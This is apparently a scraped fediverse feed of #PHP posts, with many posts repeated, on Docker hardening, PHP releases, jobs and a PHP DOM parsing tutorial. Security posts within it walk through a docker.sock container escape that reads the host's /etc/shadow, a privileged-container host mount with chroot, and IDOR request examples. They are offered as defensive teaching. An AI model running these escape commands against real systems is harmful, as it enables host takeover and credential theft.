In another terminal, watch usage from the host.

docker stats

Now clamp CPU for the running container and see the throttle take effect.

docker update ubuntu-limits --cpus=1
docker stats

The --cpus flag is a wrapper over the Linux CFS period/quota; --cpus=1 caps the container at roughly one core worth of time on a multi‑core host.

Memory limits are similar. First tighten RAM and swap, then try to over‑allocate in the container.

# On the host
docker update ubuntu-limits --memory=128m --memory-swap=256m
docker stats 

# Inside the container: stays under the cap
stress-ng --vm 1 --vm-bytes 100M --timeout 30s --vm-keep

# Inside the container: tries to exceed; you may see reclaim/pressure instead of success
stress-ng --vm 1 --vm-bytes 300M --timeout 30s --vm-keep

A few memory details matter. --memory is the hard ceiling; --memory-swap controls total RAM+swap available. Setting swap equal to memory disables swap for that container; leaving it unset often allows swap equal to the memory limit; setting -1 allows unlimited swap up to what the host provides.

docker run -it --rm \
  --name demo \
  --cpus=1 \
  --memory=256m \
  --memory-swap=256m \
  --pids-limit=25 \
  ubuntu:22.04 bash

For plain docker compose (non‑Swarm), set service‑level attributes. The Compose Services reference explicitly supports cpus, mem_limit, memswap_limit and pids_limit on services [2].

services:
  api:
    image: ubuntu:22.04
    command: ["sleep","infinity"]
    cpus: "1"              # 50% of one CPU equivalent
    mem_limit: "256m"      # hard RAM limit
    memswap_limit: "256m"  # RAM+swap; equal to mem_limit disables swap
    pids_limit: 50         # max processes inside the container

[1] https://docs.docker.com/engine/containers/resource_constraints/
[2] https://docs.docker.com/reference/compose-file/services/

For more grumpy stories visit:
1) https://infosec.exchange/@reynardsec/115093791930794699
2) https://infosec.exchange/@reynardsec/115048607028444198
3) https://infosec.exchange/@reynardsec/115014440095793678
4) https://infosec.exchange/@reynardsec/114912792051851956
5) https://infosec.exchange/@reynardsec/115133293060285123
6) https://infosec.exchange/@reynardsec/115178689445065785

#appsec #devops #programming #webdev #docker #containers #cybersecurity #infosec #cloud #sysadmin #sysops #java #php #javascript #node

Do I get that right? There is still a supply chain attack going on via npm?

And there is no way to add an npm package that excludes all known vulnerable packages? Something like https://packagist.org/packages/roave/security-advisories for packagist?

All the recommendations I have seen sonfar are to manually scan the dependencies for.vulnerable packages... So... where is the list.of vulnerable packages?

But yeah! Go on and laugh about #PHP being dead....

Do I get that right? There is still a supply chain attack going on via npm?

And there is no way to add an npm package that excludes all known vulnerable packages? Something like https://packagist.org/packages/roave/security-advisories for packagist?

All the recommendations I have seen sonfar are to manually scan the dependencies for.vulnerable packages... So... where is the list.of vulnerable packages?

But yeah! Go on and laugh about #PHP being dead....

Im still on #php 8.1 / 8.2 for production ... and some pet projects with 8.4

https://pixicstudio.medium.com/php-8-5-new-developer-features-f9617311c590

Im still on #php 8.1 / 8.2 for production ... and some pet projects with 8.4

https://pixicstudio.medium.com/php-8-5-new-developer-features-f9617311c590

Today I am mostly disabling some of the forced WordPress cruft which bloats my blog.

I have a big list of default behaviours which I turn off. You can view them at:

https://gitlab.com/edent/blog-theme/-/blob/master/includes/remove.php

What are your "favourite" things to remove from WordPress?

(NB, snarky replies about moving to a different blogging platform are not welcome.)

#WordPress #Blogging #PHP

devops0: Our audit report says we must "enable Docker rootless mode". I have no clue what that even is...
devops1: Sounds like some another security BS. What's "rootless" supposed to do?

ItSec: Relax. Rootless mode runs the Docker daemon and containers as a regular, unprivileged user [1]. It uses a user namespace, so both the daemon and your containers live in "user space", not as root. That shrinks the blast radius if the daemon or a app in container is compromised, because a breakout wouldn't hand out root on the host.

devops1: Fine. If it's "not hard" to implement, we can consider this.

ItSec: Deal.

Note: this mode does have some limitations. You can review them in docs [2].

First, let's check which user the Docker daemon is currently running as.

ps -C dockerd -o pid,user,group,cmd --no-headers

You should see something like:

9250 root     root     /usr/bin/dockerd -H fd:// --containerd=/run/containerd/containerd.sock

Here's a clean, minimal path that matches the current docs. First, stop the rootful daemon.

sudo systemctl disable --now docker.service docker.socket

Then install the uid/gid mapping tools. On Ubuntu it's uidmap.

sudo apt update && sudo apt install -y uidmap

Docker provides a setup tool. If you installed official DEB/RPM packages, it's already in /usr/bin. Run it as your normal user.

dockerd-rootless-setuptool.sh install

If that command doesn't exist, install the extras package or use the official rootless script.

sudo apt-get install -y docker-ce-rootless-extras
# or, without package manager access:
curl -fsSL https://get.docker.com/rootless | sh

The tool creates a per-user systemd service, a "rootless" CLI context, and prints environment hints. You usually want your client to talk to the user-scoped socket permanently, so export DOCKER_HOST and persist it in your shell profile.

export DOCKER_HOST=unix:///run/user/$(id -u)/docker.sock
echo 'export DOCKER_HOST=unix:///run/user/$(id -u)/docker.sock' >> ~/.bashrc

Enable auto-start for your user session and let services run even after logout ("linger").

systemctl --user enable docker
sudo loginctl enable-linger $(whoami)

Point the CLI at the new context and sanity-check.

docker context use rootless

Once more, check which privileges the Docker daemon is running with:

ps -C dockerd -o pid,user,group,cmd --no-headers

Now you will see something like:

10728 ubuntu   ubuntu   dockerd

And pssst! Podman runs containers in "rootless" mode by default [3].

[1] https://docs.docker.com/engine/security/rootless/
[2] https://docs.docker.com/engine/security/rootless/troubleshoot/
[3] https://documentation.suse.com/en-us/smart/container/html/rootless-podman/index.html#rootless-podman-sle

For more grumpy stories visit:
1) https://infosec.exchange/@reynardsec/115093791930794699
2) https://infosec.exchange/@reynardsec/115048607028444198
3) https://infosec.exchange/@reynardsec/115014440095793678
4) https://infosec.exchange/@reynardsec/114912792051851956
5) https://infosec.exchange/@reynardsec/115133293060285123

#appsec #devops #programming #webdev #java #javascript #python #php #docker #containers #k8s #cybersecurity #infosec #cloud #hacking #sysadmin #sysops

The era of Composer v1 finally comes to an end, long live Composer v2! 👑 Today packagist.org support for v1 metadata has been shut down as announced last year. https://blog.packagist.com/packagist-org-shutdown-of-composer-1-x-support-postponed-to-september-1st-2025/ #composerphp #phpc #php

The era of Composer v1 finally comes to an end, long live Composer v2! 👑 Today packagist.org support for v1 metadata has been shut down as announced last year. https://blog.packagist.com/packagist-org-shutdown-of-composer-1-x-support-postponed-to-september-1st-2025/ #composerphp #phpc #php

A friendly reminder that you can enjoy 35% off everything on our website until tomorrow at 23:59.

DRM-Free. Print includes instant ebook. 30-day returns.

Build skills that outlast jobs.

https://nostarch.com/

#programming #infosec #cybersecurity #linux #python #php #books #bookstodon #hardware #hacking #redteam #blueteam #DevOps #design #manga #lego #bash #PowerShell #R #excel #Automation #quantumcomputing #deeplearning #javascript #kotlin

#PHP was created as a dead language 😜

#PHP was created as a dead language 😜

Und bitte dran denken, die Server rechtzeitig mit frischem #PHP aufzufüllen. Gibt es im 20 Liter Kanister im Supermarkt. #Traum

Und bitte dran denken, die Server rechtzeitig mit frischem #PHP aufzufüllen. Gibt es im 20 Liter Kanister im Supermarkt. #Traum

ICYMI: @Girgias and I were interviewed by @contextfree about modern PHP. If you've not touched PHP in a while, you may be surprised at what it's been up to lately. We also go into how you can get involved in supporting the language. (Tip: Tell your company to sponsor the @phpfoundation)

https://www.youtube.com/watch?v=Sjf4jXh2GJA

#PHP #Interview

ICYMI: @Girgias and I were interviewed by @contextfree about modern PHP. If you've not touched PHP in a while, you may be surprised at what it's been up to lately. We also go into how you can get involved in supporting the language. (Tip: Tell your company to sponsor the @phpfoundation)

https://www.youtube.com/watch?v=Sjf4jXh2GJA

#PHP #Interview

A grumpy ItSec guy walks through the office when he overhears an exchange of words.

devops0: I need to manage other containers on the node from my container, hmm...
devops1: Just mount /var/run/docker.sock into it and move on.

ItSec (walking by): Guys... a quick test. From inside that container, run:

curl -s --unix-socket /var/run/docker.sock http://localhost/containers/json 

If you get JSON back, then you've handed that container admin-level control of the Docker daemon - so please don't...

devops0: So what? What does it mean?

Let's learn by example. The Docker CLI talks to the Docker daemon over a UNIX socket at (by default) /var/run/docker.sock [1]. That socket exposes the Docker Engine's REST API. With it, you can list, start, stop, create, or reconfigure containers - effectively controlling the host via the daemon. Now, the oops pattern we seeing:

# Dangerous: gives the container full control of the Docker daemon
docker run -it -v /var/run/docker.sock:/var/run/docker.sock ubuntu:24.04

If an attacker gets any code execution in that container (RCE, webshell, deserialization bug, etc), they can pivot to the Docker host. Here's how in practice:

# 1) From the compromised container that "sees" docker.sock: create a "helper" container that bind-mounts the host root

# apt update && apt install -y curl

curl --unix-socket /var/run/docker.sock -H 'Content-Type: application/json' \
  -X POST "http://localhost/containers/create?name=escape" \
  -d '{
        "Image": "ubuntu:24.04",
        "Cmd": ["sleep","infinity"],
        "HostConfig": { "Binds": ["/:/host:rw"] }
      }'

# 2) Start it
curl --unix-socket /var/run/docker.sock -X POST http://localhost/containers/escape/start

From there, the attacker can shell in and operates on /host (add SSH keys, read secrets, drop binaries, whatever), or even chroots because why not:

# Read /etc/shadow of Docker Host using only curl, step 1:

curl --unix-socket /var/run/docker.sock -s \
  -H 'Content-Type: application/json' \
  -X POST http://localhost/containers/escape/exec \
  -d '{
    "AttachStdout": true,
    "AttachStderr": true,
    "Tty": true,
      "Cmd": ["cat","/host/etc/shadow"]
  }'

# Step 2, read output of previous command (replace exec ID with yours):
curl --unix-socket /var/run/docker.sock -s --no-buffer \
  -H 'Content-Type: application/json' \
  -X POST http://localhost/exec/1ec29063e5c13ac73b907f57470552dd39519bad293bf6677bedadaad9fcde89/start \
  -d '{"Detach": false, "Tty": true}' 

Keep in mind this isn't only an RCE issue: SSRF-style bugs can coerce internal services into calling local admin endpoints (including docker.sock or a TCP-exposed daemon).

And one more important point: we understand you may not like when texts like this include conditionals: if a container is compromised, if SSRF exists, then the socket becomes a bridge to owning the host. It's understandable. Our job, however, is to assume those "ifs" eventually happen and remove the easy paths for bad actors.

[1] https://docs.docker.com/reference/cli/dockerd/#daemon-socket-option
[2] https://docs.docker.com/engine/api/

Other grumpy stories:
1) https://infosec.exchange/@reynardsec/115048607028444198
2) https://infosec.exchange/@reynardsec/115014440095793678
3) https://infosec.exchange/@reynardsec/114912792051851956

#docker #devops #containers #security #kubernetes #cloud #infosec #sre #linux #php #nodejs #java #javascript #programming #cybersecurity #rust #python #js

A grumpy ItSec guy walks through the office when he overhears an exchange of words.

dev0: Big news - we finally upgraded every framework to the latest.
dev1: And the pipeline looks good: SAST, container scan, DAST... all green.
dev0: ItSec won't have anything to nitpick now!

ItSec (walking by): ... and BAC?
dev0: BAC?
ItSec: Broken Access Control [1]. Did you actually test for it?

dev1: What's he on about this time?

Let's learn by example: imagine an endpoint that returns a specific invoice.

GET /api/invoices/123
Authorization: Bearer <token-for-user-A>

User A legitimately fetches invoice 123. Now change only the ID:

GET /api/invoices/124
Authorization: Bearer <token-for-user-A>

If the app returns 200 with User B's data, you've got Broken Access Control (aka IDOR).

Even worse, try a write operation:

PATCH /api/invoices/124
Authorization: Bearer <token-for-user-A>

{"status": "paid"}

If that works... it's a problem.

Access control enforces who can do what on which resource. When it's broken, attackers can act outside their permissions: read others data, modify or delete it, or trigger business functions they shouldn't. In practice, this often comes from missing server-side checks that tie the caller to the resource owner (or an allowed role).

Why your shiny scanners may have missed it:

1) SAST sees code patterns, not ownership semantics (it can't deduce "invoice 124 belongs to User B").
2) DAST usually crawls with one session; it rarely performs cross-identity trials (User A poking at User B's data).
3) CI/CD "green checks" mean dependencies, images, and common vulns look fine - not that your authorization logic is correct.

What can you do?

1) Enforce checks on the server (never rely on the client): before every read/update/delete, verify the caller is the owner or has a permitted role.
2) Centralize authorization in a service/middleware.
3) Prefer opaque, unguessable IDs (UUIDs) over sequential integers, but still enforce server checks (UUIDs are not security).
4) Deny by default. Make allow-lists explicit.

[1] https://owasp.org/Top10/A01_2021-Broken_Access_Control/#description

#webdev #cybersecurity #programming #java #php #nodejs #javascript #infosec

LLMに聞いてもDOMDocumentでしか使えないオプションを回答してきて、そのオプションはDom\HTMLDocument（PHP8.4からこっちが推奨になった）で使えねーと困ったが、他の解法として、これも<br></br>を<br>に置換するという原始的処理で対応できた。内部で無駄な書き換えが発生していて処理が無駄だなぁ。 #PHP

LLMに聞いてもDOMDocumentでしか使えないオプションを回答してきて、そのオプションはDom\HTMLDocument（PHP8.4からこっちが推奨になった）で使えねーと困ったが、他の解法として、これも<br></br>を<br>に置換するという原始的処理で対応できた。内部で無駄な書き換えが発生していて処理が無駄だなぁ。 #PHP

Version 2.4 of "Famsite", my self-hosted social media site, now features my Faceclick Emoji picker. (I'll be releasing Faceclick itself soon, I just need to finish the README.)

The Emoji picker more than doubled the size of the project, it's over 100Kb now. But hey, you can still fit 10 copies on a floppy! 💾

Also note that 2.1 added the grouping of daily word game result comments, a huge improvement for _my_ family. 😃

https://ratfactor.com/repos/famsite/

#php #javascript #emoji

Anyone happen to be looking for a programmer who hasn't been completely consumed by all-AI-everything by any chance? Freelance or hired, remote (based in Germany). I speak German and English and mostly worked with #PHP, #Laravel, #Kirby CMS, #Vue, #Svelte and a bit of native mobile dev (Swift and Kotlin), too.

I know the chances are slim given *everything in the world*, but maybe this time #getfedihired might work out? Boost super appreciated. Feel free to DM or email at skye@lavenderbits.com

Anyone happen to be looking for a programmer who hasn't been completely consumed by all-AI-everything by any chance? Freelance or hired, remote (based in Germany). I speak German and English and mostly worked with #PHP, #Laravel, #Kirby CMS, #Vue, #Svelte and a bit of native mobile dev (Swift and Kotlin), too.

I know the chances are slim given *everything in the world*, but maybe this time #getfedihired might work out? Boost super appreciated. Feel free to DM or email at skye@lavenderbits.com

Anyone happen to be looking for a programmer who hasn't been completely consumed by all-AI-everything by any chance? Freelance or hired, remote (based in Germany). I speak German and English and mostly worked with #PHP, #Laravel, #Kirby CMS, #Vue, #Svelte and a bit of native mobile dev (Swift and Kotlin), too.

I know the chances are slim given *everything in the world*, but maybe this time #getfedihired might work out? Boost super appreciated. Feel free to DM or email at skye@lavenderbits.com

A grumpy ItSec guy walks through the office when he overhears an exchange of words.

Dev0: Hey, this isn't working, I hate containers...
Dev1: Maybe just add the --privileged flag!

ItSec: Just… no. Simply no. No privileged mode - the grumpy fellow interjects as he walks away.

Dev0: Jesus, fine - no privileged mode.
Dev1: Okay, but… why?

Here's why (one, simple example): 

Docker's --privileged flag lifts almost all restrictions from your container - exactly the opposite of --cap-drop=ALL. Let's demo the difference. 

1) Start two containers.

docker run -itd --privileged --name ubuntu-privileged ubuntu
docker run -itd --name ubuntu-unprivileged ubuntu

2) Inspect /dev in the unprivileged container.

docker exec -it ubuntu-unprivileged bash
ls /dev
exit

You'll only see a limited set of devices. No disk access. 

3) Now inspect /dev in the privileged container.

docker exec -it ubuntu-privileged bash
ls /dev

/dev/sda exposed! Sometimes you may see /dev/mapper when LVM is in place. Then "apt update && apt install -y lvm2" and "lvscan" may help during next phase.

4) Exploitation part (inside the privileged container) - simply mount /dev/sda to any writable path in container.

mkdir /tmp/whatever
mount /dev/sda1 /tmp/whatever

5) You can now enumerate - and access - the Docker host's logical volume.

ls -la /tmp/whatever

6) If you wish, you can even chroot into the host:

chroot /tmp/whatever /bin/bash

The moral of the story is to avoid privileged mode, because in the event of an incident (e.g. an attacker compromising an app running inside a container), you significantly increase the likelihood of successful lateral movement from the container to the Docker host - and from there into the rest of your infrastructure.

Usually the grumpy guy means well. He just doesn't know how to explain it properly.

#devops #programming #webdev #java #linux #cybersecurity #php #nodejs

Hey #PHP,

I don't normally market code, I write and leave it on github for you to find.

I can be wrong, I'm happy to be wrong.

But I believe, with every ounce of my being, that this is going to be important for our survival in the long term.

https://krakjoe.github.io/ort/

#php #ai

Hey #PHP,

I don't normally market code, I write and leave it on github for you to find.

I can be wrong, I'm happy to be wrong.

But I believe, with every ounce of my being, that this is going to be important for our survival in the long term.

https://krakjoe.github.io/ort/

#php #ai

@ck0 @elena most small websites don't need a #cdn
Use caching and compressed images.
Using the latest #PHP version would help as well.

All about the new pipe operator in PHP 8.5:

https://thephp.foundation/blog/2025/07/11/php-85-adds-pipe-operator/

#PHP #programming #programminglanguages

I’ve created an RFC to re-license #PHP under the Modified BSD License (BSD-3-Clause).

Please spread this far and wide. Discussion is open for 6 months so everyone can voice concerns or ask questions.

https://news-web.php.net/php.internals/127984

I’ve created an RFC to re-license #PHP under the Modified BSD License (BSD-3-Clause).

Please spread this far and wide. Discussion is open for 6 months so everyone can voice concerns or ask questions.

https://news-web.php.net/php.internals/127984

PHP people,

I'm trying to convert some python that I wrote many years ago to #PHP. The code takes a word (string) and converts it into IPA(International Phonetic Alphabet) based on an alphabet character=>IPA dictionary (array).

In Python every string is an array, but in PHP it's not.

How do I iterate over a string not just seeking for individual characters but also for groups of characters? For instance the word 'light' I'd want to seek for 'igh', which would be converted to 'aɪ'

TIA

#Programming #Python #ConLang #Code

New #PHP RFC just dropped:

Updating the PHP License, https://news-web.php.net/php.internals/127984

New #PHP RFC just dropped:

Updating the PHP License, https://news-web.php.net/php.internals/127984

Just read a fun thread, so felt it was a good time to throw this out into the world:

I love PHP.
PHP is awesome.
PHP is secure.
PHP powers a lot of the world.

😎

#php

New #PHP RFC just dropped:

Updating the PHP License, https://news-web.php.net/php.internals/127984

Just read a fun thread, so felt it was a good time to throw this out into the world:

I love PHP.
PHP is awesome.
PHP is secure.
PHP powers a lot of the world.

😎

#php

🎉 PHP 8.5.0 Alpha 1 is available for testing!

In this very initial preview for PHP 8.5, we have:

- Pipe operator (|>)
- Final property promotion
- New array_first() and array_last() functions
- New #[\NoDiscard] attribute

… and more!

➕ Do: Test your projects!

➖ Don't: Run it in production. It's not fully ready yet.

Congratulations to Daniel, @edorian, and @adoy

🔗 https://www.php.net/archive/2025.php#2025-07-03-5

#PHP #Release

What's the preferred easy-to-use benchmarking tool these days for testing full HTTP responses? I know ab (apache bench), but it's also very old so I assume there's a new favorite.

This is for mostly informal tests, so ease of use > capability. Must run on Linux CLI.

#PHP

????????
嘘つきは数字を使うってこのことか

あなたのモダン技術、5年後にはあなたは理解できなくなります #PHP - Qiita https://share.google/FGKjn4nS0P6zxJSF2

Quant aux choix des dons, chaque salarié⋅e du 24ème a disposé de 14 tranches de 24€ à répartir aux projets libres de son choix. Ensuite, nous les avons mis en commun pour se répartir les paiements redondant. Une méthode bien efficace : en moins d'une demi journée, nous avons pu choisir et aider 30 projets.

Voici la liste des dons : https://github.com/24eme/banque/blob/master/data/dons.csv

(2/2)

#Yunohost #Framasoft #Debian #php #bigbluebutton #gnome #imagemagick #git #organicmaps #fdroid #weblate #kitty #signal #CopyPublique

Quant aux choix des dons, chaque salarié⋅e du 24ème a disposé de 14 tranches de 24€ à répartir aux projets libres de son choix. Ensuite, nous les avons mis en commun pour se répartir les paiements redondant. Une méthode bien efficace : en moins d'une demi journée, nous avons pu choisir et aider 30 projets.

Voici la liste des dons : https://github.com/24eme/banque/blob/master/data/dons.csv

(2/2)

#Yunohost #Framasoft #Debian #php #bigbluebutton #gnome #imagemagick #git #organicmaps #fdroid #weblate #kitty #signal #CopyPublique

Functional programming isn't just for Haskell developers. It's for #PHP developers, too. "Thinking Functionally in PHP" is available from LeanPub.

https://leanpub.com/thinking-functionally-in-php

Functional programming isn't just for Haskell developers. It's for #PHP developers, too. "Thinking Functionally in PHP" is available from LeanPub.

https://leanpub.com/thinking-functionally-in-php

I spoke to @ricmac of The New Stack on the occasion of PHP's 30th birthday.

The Herd Is Strong: PHP and Its Developer Ecosystem at 30: https://thenewstack.io/the-herd-is-strong-php-and-its-developer-ecosystem-at-30/

#php #30YearsOfPHP

I spoke to @ricmac of The New Stack on the occasion of PHP's 30th birthday.

The Herd Is Strong: PHP and Its Developer Ecosystem at 30: https://thenewstack.io/the-herd-is-strong-php-and-its-developer-ecosystem-at-30/

#php #30YearsOfPHP

Happy 30th birthday to #PHP. I wrote a history of it several years ago: “If CGI scripts were the start of interactive programming on the web, then PHP was the natural next step — at least on the server-side. Just a month after Brendan Eich created the JavaScript scripting language at Netscape, an independent developer from Canada named Rasmus Lerdorf released the first version of a toolset he called Personal Home Page Tools (PHP Tools).” https://cybercultural.com/p/1995-php-quietly-launches-as-a-cgi-scripts-toolset/

Happy 30th birthday to #PHP. I wrote a history of it several years ago: “If CGI scripts were the start of interactive programming on the web, then PHP was the natural next step — at least on the server-side. Just a month after Brendan Eich created the JavaScript scripting language at Netscape, an independent developer from Canada named Rasmus Lerdorf released the first version of a toolset he called Personal Home Page Tools (PHP Tools).” https://cybercultural.com/p/1995-php-quietly-launches-as-a-cgi-scripts-toolset/

Happy 30th birthday to #PHP. I wrote a history of it several years ago: “If CGI scripts were the start of interactive programming on the web, then PHP was the natural next step — at least on the server-side. Just a month after Brendan Eich created the JavaScript scripting language at Netscape, an independent developer from Canada named Rasmus Lerdorf released the first version of a toolset he called Personal Home Page Tools (PHP Tools).” https://cybercultural.com/p/1995-php-quietly-launches-as-a-cgi-scripts-toolset/

🎂 Thirty years ago today, PHP was released!

How time has flown. Here's to thirty more great years! 🎉

#PHP #30YearsOfPHP

Happy 30th birthday to #PHP. I wrote a history of it several years ago: “If CGI scripts were the start of interactive programming on the web, then PHP was the natural next step — at least on the server-side. Just a month after Brendan Eich created the JavaScript scripting language at Netscape, an independent developer from Canada named Rasmus Lerdorf released the first version of a toolset he called Personal Home Page Tools (PHP Tools).” https://cybercultural.com/p/1995-php-quietly-launches-as-a-cgi-scripts-toolset/

Happy 30th birthday to #PHP. I wrote a history of it several years ago: “If CGI scripts were the start of interactive programming on the web, then PHP was the natural next step — at least on the server-side. Just a month after Brendan Eich created the JavaScript scripting language at Netscape, an independent developer from Canada named Rasmus Lerdorf released the first version of a toolset he called Personal Home Page Tools (PHP Tools).” https://cybercultural.com/p/1995-php-quietly-launches-as-a-cgi-scripts-toolset/

In the summer of 2008, I was at a small agency doing video work. When our "webmaster" left, my boss asked if I could "make heads or tails of this #PHP".

Smug from years of writing #BASIC on a TI-83+, I decided to give it a shot and ended up changing my career trajectory.

Happy 30th, PHP! You're not the only language, but you're the one I always come back to 😁

In the summer of 2008, I was at a small agency doing video work. When our "webmaster" left, my boss asked if I could "make heads or tails of this #PHP".

Smug from years of writing #BASIC on a TI-83+, I decided to give it a shot and ended up changing my career trajectory.

Happy 30th, PHP! You're not the only language, but you're the one I always come back to 😁

Happy 30th birthday to #PHP. I wrote a history of it several years ago: “If CGI scripts were the start of interactive programming on the web, then PHP was the natural next step — at least on the server-side. Just a month after Brendan Eich created the JavaScript scripting language at Netscape, an independent developer from Canada named Rasmus Lerdorf released the first version of a toolset he called Personal Home Page Tools (PHP Tools).” https://cybercultural.com/p/1995-php-quietly-launches-as-a-cgi-scripts-toolset/

🎂 Thirty years ago today, PHP was released!

How time has flown. Here's to thirty more great years! 🎉

#PHP #30YearsOfPHP

My employer, after 7 months of work, fired me overnight. Because I would be too "finicky" about code quality and security risks, which would better suit "a bank or cybersecurity company".

So I'm again #lookingForJob, either at #Montpellier (France) or #fullRemote. I am a #fullStack #developer with almost 10 years of experience on #php, #symfony, #html, #css, #javascript (#jquery and I'm also learning #vue). I am fluent in English, both written and spoken.

#FediHire

My employer, after 7 months of work, fired me overnight. Because I would be too "finicky" about code quality and security risks, which would better suit "a bank or cybersecurity company".

So I'm again #lookingForJob, either at #Montpellier (France) or #fullRemote. I am a #fullStack #developer with almost 10 years of experience on #php, #symfony, #html, #css, #javascript (#jquery and I'm also learning #vue). I am fluent in English, both written and spoken.

#FediHire

Mon employeur, après 7 mois de période d'essai, vient de la rompre du jour au lendemain. Parce que je serais trop "pointilleuse" sur le code et les risques de sécurité, ce qui conviendrait mieux au secteur "de la banque ou de la cybersécurité".

Donc #jeChercheUnJob à nouveau, sur #Montpellier ou #fullRemote. Je suis #developpeuse #fullStack avec presque 10 ans d'expérience professionnelle sur #php, #symfony, #html, #css, #javascript (#jquery mais je suis en train de me former sur #vue)

My employer, after 7 months of work, fired me overnight. Because I would be too "finicky" about code quality and security risks, which would better suit "a bank or cybersecurity company".

So I'm again #lookingForJob, either at #Montpellier (France) or #fullRemote. I am a #fullStack #developer with almost 10 years of experience on #php, #symfony, #html, #css, #javascript (#jquery and I'm also learning #vue). I am fluent in English, both written and spoken.

#FediHire

Mon employeur, après 7 mois de période d'essai, vient de la rompre du jour au lendemain. Parce que je serais trop "pointilleuse" sur le code et les risques de sécurité, ce qui conviendrait mieux au secteur "de la banque ou de la cybersécurité".

Donc #jeChercheUnJob à nouveau, sur #Montpellier ou #fullRemote. Je suis #developpeuse #fullStack avec presque 10 ans d'expérience professionnelle sur #php, #symfony, #html, #css, #javascript (#jquery mais je suis en train de me former sur #vue)

PHPで書かれたWebRTC実装!!

PHP-WebRTC/webrtc: A pure PHP implementation of WebRTC : 👀
---
https://github.com/PHP-WebRTC/webrtc

#WebRTC #PHP

It’s pretty cool to (belatedly) learn that #FrankenPHP is now an official project of @thephpf. Congrats!

https://thephp.foundation/blog/2025/05/15/frankenphp/

I’m curious why this news (which I’ve only just now found out about) wasn’t posted on any official Fediverse channels.

#PHP

It’s pretty cool to (belatedly) learn that #FrankenPHP is now an official project of @thephpf. Congrats!

https://thephp.foundation/blog/2025/05/15/frankenphp/

I’m curious why this news (which I’ve only just now found out about) wasn’t posted on any official Fediverse channels.

#PHP

我很討厭 #PHP 的一個原因就是 Web server （如Nginx）與 PHP-FPM 的連接方式，都沒有一個標準的解答，網路上找的到的都是複製貼上的結果，根本不能用。

然後就如同 Orange 所說的，連 Nginx 官方給的設置範例都有安全性問題。

can someone recommend a http-signature library/implementation in #php ?

#activitypub #wordpress #followerpower

can someone recommend a http-signature library/implementation in #php ?

#activitypub #wordpress #followerpower

I have just released the biggest release in #loupe's history!

🚀 Major search engine overhaul!
🔧 Rewritten core logic
⚡ Faster queries & optimized SQLite
📊 Faceted search support!
🎯 Better ranking & aggregate sorting
📏 Offset, limit, total hit config
🧠 Smarter schema diffs & simpler queries
🖼️ Displayed attrs, cropping, highlights
📦 Configs & params now serializable
🔍 New Browse API
🛠️ Tons of fixes & polish!

Enjoy!

https://github.com/loupe-php/loupe/releases/tag/0.11.0 #php #search

I have just released the biggest release in #loupe's history!

🚀 Major search engine overhaul!
🔧 Rewritten core logic
⚡ Faster queries & optimized SQLite
📊 Faceted search support!
🎯 Better ranking & aggregate sorting
📏 Offset, limit, total hit config
🧠 Smarter schema diffs & simpler queries
🖼️ Displayed attrs, cropping, highlights
📦 Configs & params now serializable
🔍 New Browse API
🛠️ Tons of fixes & polish!

Enjoy!

https://github.com/loupe-php/loupe/releases/tag/0.11.0 #php #search

DB が単一 #php ファイルなの、潔いな

Stop using preg_* on HTML and start using \Dom\HTMLDocument instead

https://shkspr.mobi/blog/2025/05/stop-using-preg_-on-html-and-use-domhtmldocument/

It is a truth universally acknowledged that a programmer in possession of some HTML will eventually try to parse it with a regular expression.

This makes many people very angry and is widely regarded as a bad move.

In the bad old days, it was somewhat understandable for a PHP coder to run a quick-and-dirty preg_replace() on a scrap of code. They probably could control the input and there wasn't a great way to manipulate an HTML5 DOM.

Rejoice sinners! PHP 8.4 is here to save your wicked souls. There's a new HTML5 Parser which makes everything better and stops you having to write brittle regexen.

Here are a few tips - mostly notes to myself - but I hope you'll find useful.

Sanitise HTML

This is the most basic example. This loads HTML into a DOM, tries to fix all the mistakes it finds, and then spits out the result.

 PHP$html = '<p id="yes" id="no"><em>Hi</div><h2>Test</h3><img />';$dom = \Dom\HTMLDocument::createFromString( $html, LIBXML_NOERROR | LIBXML_HTML_NOIMPLIED , "UTF-8" );echo $dom->saveHTML();

It uses LIBXML_HTML_NOIMPLIED because we don't want a full HTML document with a doctype, head, body, etc.

If you want Pretty Printing, you can use my library.

Get the plain text

OK, so you've got the DOM, how do you get the text of the body without any of the surrounding HTML

 PHP$html = '<p><em>Hello</em> World!</p>';$dom = \Dom\HTMLDocument::createFromString( $html, LIBXML_NOERROR , "UTF-8" );echo $dom->body->textContent;

Note, this doesn't replace images with their alt text.

Get a single element

You can use the same querySelector() function as you do in JavaScript!

 PHP$element = $dom->querySelector( "h2" );

That returns a pointer to the element. Which means you can run:

 PHP$element->setAttribute( "id", "interesting" );echo $dom->querySelector( "h2" )->attributes["id"]->value;

And you will see that the DOM has been manipulated!

Search for multiple elements

Suppose you have a bunch of headings and you want to get all of them. You can use the same querySelectorAll() function as you do in JavaScript!

To get all headings, in the order they appear:

 PHP$headings = $dom->querySelectorAll( "h1, h2, h3, h4, h5, h6" );foreach ( $headings as $heading ) {   // Do something}

Advanced Search

Suppose you have a bunch of links and you want to find only those which point to "example.com/test/". Again, you can use the same attribute selectors as you would elsewhere

 PHP$dom->querySelectorAll( "a[href^=https\:\/\/example\.com\/test\/]" );

Replacing content

Sadly, it isn't quite as simple as setting the innerHTML. Each search returns a node. That node may have children. Those children will also be node which, themselves, may have children, and so on.

Let's take a simple example:

 PHP$html = '<h2>Hello</h2>';$dom = \Dom\HTMLDocument::createFromString( $html, LIBXML_NOERROR | LIBXML_HTML_NOIMPLIED, "UTF-8" );$element = $dom->querySelector( "h2" );$element->childNodes[0]->textContent = "Goodbye";echo $dom->saveHTML();

That changes "Hello" to "Goodbye".

But what if the element has child nodes?

 PHP$html = '<h2>Hello <em>friend</em></h2>';$dom = \Dom\HTMLDocument::createFromString( $html, LIBXML_NOERROR | LIBXML_HTML_NOIMPLIED, "UTF-8" );$element = $dom->querySelector( "h2" );$element->childNodes[0]->textContent = "Goodbye";echo $dom->saveHTML();

That outputs <h2>Goodbye<em>friend</em></h2> - so think carefully about the structure of the DOM and what you want to replace.

Adding a new node

This one is tricky! Let's suppose you have this:

 HTML<div id="page">   <main>      <h2>Hello</h2>

You want to add an <h1> before the <h2>. Here's how to do this.

First, you need to construct the DOM:

 PHP$html = '<div id="page"><main><h2>Hello</h2>';$dom = \Dom\HTMLDocument::createFromString( $html, LIBXML_NOERROR | LIBXML_HTML_NOIMPLIED, "UTF-8" );

Next, you need to construct an entirely new DOM for your new node.

 PHP$newHTML = "<h1>Title</h1>";$newDom = \Dom\HTMLDocument::createFromString( $newHTML, LIBXML_NOERROR | LIBXML_HTML_NOIMPLIED, "UTF-8" );

